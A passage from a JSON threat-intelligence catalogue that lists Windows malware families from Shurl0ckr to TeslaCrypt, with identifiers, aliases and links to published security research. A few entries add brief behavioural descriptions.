"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/shurl0ckr-ransomware-as-a-service-peddled-on-dark-web-can-reportedly-bypass-cloud-applications" ], "synonyms": [], "type": [] }, "uuid": "f544ee0e-26f4-48e7-aaee-056f4d1ced82", "value": "Shurl0ckr" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock", "https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/", "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html", "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/", "https://securityintelligence.com/shylocks-new-trick-evading-malware-researchers/", "https://www.europol.europa.eu/newsroom/news/global-action-targeting-shylock-malware", "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw" ], "synonyms": [ "Caphaw" ], "type": [] }, "uuid": "515ee69a-298a-4fcf-bdb0-c5fc6d41872f", "value": "Shylock" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder", "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c", "https://s.tencent.com/research/report/479.html" ], "synonyms": [], "type": [] }, "uuid": "3c43bd4c-8c40-47b5-ae97-3dd0f0c0e8d8", "value": "SideWinder" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/" ], "synonyms": [ "Destover" ], "type": [] }, "uuid": "da92c927-9b31-48aa-854a-8ed49a29565b", "value": "Sierra(Alfa,Bravo, ...)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.siggen6" ], 
"synonyms": [], "type": [] }, "uuid": "c12b3e30-32bf-4b7e-98f6-6a00e95553f8", "value": "Siggen6" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence", "http://www.intezer.com/silenceofthemoles/", "https://securelist.com/the-silence/83009/", "https://www.group-ib.com/resources/threat-research/silence.html" ], "synonyms": [ "TrueBot" ], "type": [] }, "uuid": "0df52c23-690b-4703-83f7-5befc38ab376", "value": "Silence" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silon", "http://www.internetnews.com/security/article.php/3846186/TwoHeaded+Trojan+Targets+Online+Banks.htm", "http://contagiodump.blogspot.com/2009/11/new-banking-trojan-w32silon-msjet51dll.html" ], "synonyms": [], "type": [] }, "uuid": "b602edb3-81c2-4772-b5f8-73deb85cb40a", "value": "Silon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.siluhdur" ], "synonyms": [], "type": [] }, "uuid": "774fcb67-1eeb-4bda-9b36-b624b632417a", "value": "Siluhdur" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.simda", "https://secrary.com/ReversingMalware/iBank/" ], "synonyms": [ "iBank" ], "type": [] }, "uuid": "467ee29c-317f-481a-a77c-69961eb88c4d", "value": "Simda" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal", "https://en.wikipedia.org/wiki/Torpig", "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2", "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan", "https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/" ], "synonyms": [ "Anserin", "Mebroot", "Quarian", "Theola", "Torpig" ], "type": [] }, "uuid": "ad5bcaef-1a86-4cc7-8f2e-32306b995018", "value": "Sinowal" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/", "https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4" ], "synonyms": [], "type": [] }, "uuid": "0fba78fc-47a1-45e1-b5df-71bcabd23b5d", "value": "Sisfader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.skarab_ransom", "http://malware-traffic-analysis.net/2017/11/23/index.html" ], "synonyms": [], "type": [] }, "uuid": "c1ccba65-e2f0-4f29-8e04-6b119c7f8694", "value": "Skarab Ransom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.skyplex" ], "synonyms": [], "type": [] }, "uuid": "39002a0d-99aa-4568-b110-48f6df1759cd", "value": "Skyplex" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slave", "https://www.cert.pl/en/news/single/slave-banatrix-and-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "1f4d8d42-8f31-47f8-b2b7-2d43196de532", "value": "Slave" }, { "description": "- 2012 first sighted\r\n- Attack vector via compromised Microtik routers where victim's got infection when they connect to Microtik router admin software - Winbox\r\n- 2018 when discovered by Kaspersky Team\r\n\r\nInfection Vector\r\n- Infected Microtik Router > Malicious DLL (IP4.dll) in Router > User connect via windbox > Malicious DLL downloaded on computer", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot", "https://securelist.com/apt-slingshot/84312/", "https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf", "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/" ], "synonyms": [], "type": [] }, "uuid": "d6178858-1244-41cf-aeed-8c6afc1d6846", "value": "Slingshot" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.smac", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf" ], "synonyms": [ "speccom" ], "type": [] }, "uuid": "a8561caf-eb9f-4a02-8277-a898a0a259ae", "value": "smac" }, { "description": "The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader", "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/", "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/", "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis", "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign", "https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo", "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/", "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/", 
"https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait", "https://www.cert.pl/en/news/single/dissecting-smoke-loader/", "https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/" ], "synonyms": [ "Dofoil" ], "type": [] }, "uuid": "ba91d713-c36e-4d98-9fb7-e16496a69eec", "value": "SmokeLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru", "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" ], "synonyms": [ "Ismo" ], "type": [] }, "uuid": "26b91007-a8ae-4e32-bd99-292e44735c3d", "value": "Smominru" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smrss32", "https://www.bleepingcomputer.com/forums/t/623132/smrss32-encrypted-ransomware-help-support-how-to-decryptbmp/", "https://www.youtube.com/watch?v=7gCU31ScJgk" ], "synonyms": [], "type": [] }, "uuid": "1fe0b2fe-5f9b-4359-b362-be611537442a", "value": "Smrss32 Ransomware" }, { "description": "A downloader trojan with some infostealer capabilities focused on the browser. 
Previously observed as part of RigEK campaigns.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader", "https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/", "https://twitter.com/VK_Intel/status/898549340121288704", "https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/", "https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/" ], "synonyms": [], "type": [] }, "uuid": "467c726e-6e19-4d15-88b6-362cbe0b3d20", "value": "SnatchLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sneepy", "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/" ], "synonyms": [ "ByeByeShell" ], "type": [] }, "uuid": "212d1ed7-0519-412b-a1ce-56046ca93372", "value": "SNEEPY" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula", "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf" ], "synonyms": [ "Ursnif" ], "type": [] }, "uuid": "4f3ad937-bf2f-40cb-9695-a2bedfd41bfa", "value": "Snifula" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan", "https://medium.com/@jacob16682/snojan-analysis-bb3982fb1bb9" ], "synonyms": [], "type": [] }, "uuid": "0646a6eb-1c13-4d87-878e-9431314597bf", "value": "Snojan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snslocker" ], "synonyms": [], "type": [] }, "uuid": "99a10948-d7ba-4ad0-b73c-c7762143a193", "value": "SNS Locker" }, { "description": "According to ESET, this RAT was derived from (the open-source) Quasar RAT.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sobaken", "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" ], "synonyms": [], "type": [] }, "uuid": 
"81e4fc8f-7b05-42bf-8ff9-568362d4f964", "value": "Sobaken" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.socks5_systemz" ], "synonyms": [], "type": [] }, "uuid": "38734f44-ebc4-4250-a20e-5dac0fb5c0ed", "value": "Socks5 Systemz" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot", "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", "https://www.accenture.com/t00010101T000000Z__w__/gb-en/_acnmedia/PDF-83/Accenture-Goldfin-Security-Alert.pdf", "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf" ], "synonyms": [ "BIRDDOG", "Nadrac" ], "type": [] }, "uuid": "da34bf80-6dc6-4b07-8094-8bed2c1176ec", "value": "SocksBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot", "https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/", "https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/" ], "synonyms": [ "Napolar" ], "type": [] }, "uuid": "d61a1656-9413-46de-bd19-c7fe5eda3371", "value": "Solarbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya", "https://www.codeandsec.com/Soraya-Malware-Analysis-Dropper", "https://www.arbornetworks.com/blog/asert/the-best-of-both-worlds-soraya/" ], "synonyms": [], "type": [] }, "uuid": "26aa3c43-5049-4a2e-bec1-9709b31a1a26", "value": "soraya" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorgu", "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" ], "synonyms": [], "type": [] }, "uuid": "bc135ba5-637b-46c9-94fc-2eef5e018bb5", "value": "Sorgu" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite", "https://attack.mitre.org/wiki/Software/S0157", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" ], "synonyms": [ "denis" ], "type": [] }, "uuid": "f4cac204-3d3f-4bb6-84bd-fc27b2f5158c", "value": "SOUNDBITE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spedear", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" ], "synonyms": [], "type": [] }, "uuid": "bd29030e-d440-4842-bc2a-c173ed938da4", "value": "Spedear" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom", "https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/", "https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/", "https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas", "https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware", "https://github.com/MinervaLabsResearch/SporaVaccination", "http://malware-traffic-analysis.net/2017/01/17/index2.html" ], "synonyms": [], "type": [] }, "uuid": "7eeafa7c-0282-4667-bb1a-5ebc3a845d6d", "value": "Spora" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot" ], "synonyms": [], "type": [] }, "uuid": "34e9d701-22a1-4315-891d-443edd077abf", "value": "SpyBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spynet_rat" ], "synonyms": [], "type": [] }, "uuid": "552745f4-6702-47a5-b517-9b099937573f", "value": "win.spynet_rat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirtdanger", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-squirtdanger-swiss-army-knife-malware-veteran-malware-author-thebottle/" ], "synonyms": [], "type": [] }, "uuid": 
"858a2cdb-9c89-436a-b8d4-60c725c7ac63", "value": "SquirtDanger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm", "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "009db412-762d-4256-8df9-eb213be01ffd", "value": "SslMM" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stabuniq", "http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html", "https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers" ], "synonyms": [], "type": [] }, "uuid": "faa2196f-df4c-454c-995e-ded7864d5fa8", "value": "Stabuniq" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stampedo", "https://www.bleepingcomputer.com/news/security/stampado-ransomware-campaign-decrypted-before-it-started/" ], "synonyms": [], "type": [] }, "uuid": "b1efbadf-26e5-4e35-8fd2-61642c30ecbf", "value": "Stampedo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.starcruft", "https://securelist.com/operation-daybreak/75100/" ], "synonyms": [], "type": [] }, "uuid": "acd8fc63-c22a-4c11-907e-33e358fdd293", "value": "StarCruft" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.starloader", "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" ], "synonyms": [], "type": [] }, "uuid": "f1decba9-6b3b-4636-a2b6-2208e178591a", "value": "StarLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.starsypound", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" 
], "synonyms": [], "type": [] }, "uuid": "6df9bbd4-ab32-4d09-afdb-97eed274520a", "value": "StarsyPound" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stegoloader", "https://www.secureworks.com/research/stegoloader-a-stealthy-information-stealer" ], "synonyms": [], "type": [] }, "uuid": "aea21616-061d-4177-9512-8887853394ed", "value": "StegoLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger" ], "synonyms": [], "type": [] }, "uuid": "82ab5235-a71e-4692-a08c-8db337d8b53a", "value": "Stinger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stration" ], "synonyms": [], "type": [] }, "uuid": "0439c5ec-306e-4473-84f7-50bdb5539fc2", "value": "Stration" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint", "https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/", "https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/", "https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/", "https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/" ], "synonyms": [], "type": [] }, "uuid": "00dedcea-4f87-4b6d-b12d-7749281b1366", "value": "Stresspaint" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity", "https://twitter.com/physicaldrive0/status/786293008278970368", "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/", "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/", "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/" ], 
"synonyms": [], "type": [] }, "uuid": "da2969f2-01e9-4ca8-b2f3-5fc9a9891d57", "value": "StrongPity" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet", "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html" ], "synonyms": [], "type": [] }, "uuid": "6ad84f52-0025-4a9d-861a-65c870f47988", "value": "Stuxnet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/", "http://pwc.blogs.com/cyber_security_updates/2016/03/index.html" ], "synonyms": [], "type": [] }, "uuid": "a51b82ba-7e32-4a8e-b5d0-8d0441bdcce4", "value": "SunOrcal" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox" ], "synonyms": [], "type": [] }, "uuid": "dd9939a4-df45-4c7c-8a8d-83b40766aacd", "value": "SuppoBox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.swift", "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" ], "synonyms": [], "type": [] }, "uuid": "8420653b-1412-45a1-9a2d-6aa9b9eaf906", "value": "Swift?" 
}, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sword", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "2112870f-06f1-44a9-9c43-6cc4fb90e295", "value": "Sword" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot", "https://www.alienvault.com/blogs/labs-research/sykipot-is-back", "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/", "https://community.rsa.com/thread/185437", "https://www.symantec.com/connect/blogs/sykipot-attacks" ], "synonyms": [ "getkys" ], "type": [] }, "uuid": "99ffeb75-8d21-43a2-b5f7-f58bcbac2228", "value": "sykipot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synack", "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" ], "synonyms": [], "type": [] }, "uuid": "a396a0bb-6dc5-424a-bdbd-f8ba808ca2c2", "value": "SynAck" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synccrypt", "https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/" ], "synonyms": [], "type": [] }, "uuid": "e717a26d-17aa-4cd7-88de-dc75aa365232", "value": "SyncCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synflooder", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "d327b4d9-e1c8-4c71-b9fe-775d1607e7d4", "value": "SynFlooder" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synth_loader" ], "synonyms": [], "type": [] }, "uuid": "ffd74637-b518-4622-939b-c0669a81f3a9", "value": "Synth Loader" 
}, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10", "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "2ae57534-6aac-4025-8d93-888dab112b45", "value": "Sys10" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon", "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", "http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/" ], "synonyms": [], "type": [] }, "uuid": "4f079a71-bb1b-47b6-a6d0-26a37cd8a3a6", "value": "Syscon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" ], "synonyms": [], "type": [] }, "uuid": "a4b9c526-42d0-4de9-ab8e-e78f99655d11", "value": "SysGet" }, { "description": "Sysraw stealer got its name because at some point, it was started as \"ZSysRaw\\sysraw.exe\". PDB strings suggest the name \"Clipsa\" though. First stage connects to /WPCoreLog/, the second one to /WPSecurity/. Its behavior suggest that it is an info stealer. It creates a rather large amount of files in a subdirectory (e.g. 
data) named \"1?[-+].dat\" and POSTs them.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysraw_stealer", "https://zerophagemalware.com/2017/09/21/rig-ek-via-rulan-drops-an-infostealer/" ], "synonyms": [ "Clipsa" ], "type": [] }, "uuid": "f90e9fb9-d60d-415e-9f7f-786ee45f6947", "value": "Sysraw Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysscan" ], "synonyms": [], "type": [] }, "uuid": "7007b268-f6f4-4a01-9184-fc2334461c38", "value": "SysScan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.szribi", "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel", "https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html", "https://www.secureworks.com/research/srizbi" ], "synonyms": [], "type": [] }, "uuid": "66b1094f-7779-43ad-a32b-a9414babcc76", "value": "Szribi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tabmsgsql", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "48aa9c41-f420-418b-975c-1fb6e2a91145", "value": "TabMsgSQL" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor", "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf", "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html" ], "synonyms": [ "simbot" ], "type": [] }, "uuid": "94323b32-9566-450b-8480-5f9f53b57948", "value": "taidoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret", 
"https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", "http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html" ], "synonyms": [], "type": [] }, "uuid": "b0467c03-824f-4071-8668-f056110d2a50", "value": "Taleret" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tandfuy" ], "synonyms": [], "type": [] }, "uuid": "88ff523e-206b-4918-8c93-e2829427eef2", "value": "Tandfuy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux", "https://securelist.com/files/2014/11/darkhotel_kl_07.11.pdf" ], "synonyms": [], "type": [] }, "uuid": "71e77349-98f5-49c6-bff7-6ed3b3d79410", "value": "Tapaoux" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tarsip", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "ea6a62b2-db33-4d60-9823-5117c20b6457", "value": "Tarsip" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf" ], "synonyms": [], "type": [] }, "uuid": "bbbf4786-1aba-40ac-8ad7-c9d8c66197a8", "value": "tDiscoverer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdtess", "http://www.clearskysec.com/tulip/" ], "synonyms": [], "type": [] }, "uuid": "99d83ee8-6870-4af2-a3c8-cf86baff7cb3", "value": "TDTESS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.telebot", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" ], "synonyms": [], "type": [] }, "uuid": "06e0d676-8160-4b65-b6ea-d7634c962809", "value": "TeleBot" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.teledoor", "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html", "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/" ], "synonyms": [], "type": [] }, "uuid": "b71f1656-975a-4daa-8109-00c30fd20410", "value": "TeleDoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tempedreve" ], "synonyms": [], "type": [] }, "uuid": "26b2c2c0-036e-4e3a-a465-71a391046b74", "value": "Tempedreve" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat", "https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", "https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf", "https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf" ], "synonyms": [ "Fakem RAT" ], "type": [] }, "uuid": "b127028b-ecb1-434b-abea-e4df3ca458b9", "value": "Terminator RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt", "https://blogs.cisco.com/security/talos/teslacrypt", "https://securelist.com/teslacrypt-2-0-disguised-as-cryptowall/71371/", "https://success.trendmicro.com/solution/1113900-emerging-threat-on-ransom-cryptesla", "https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/", "https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/", "https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf", "https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/", "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack" ], 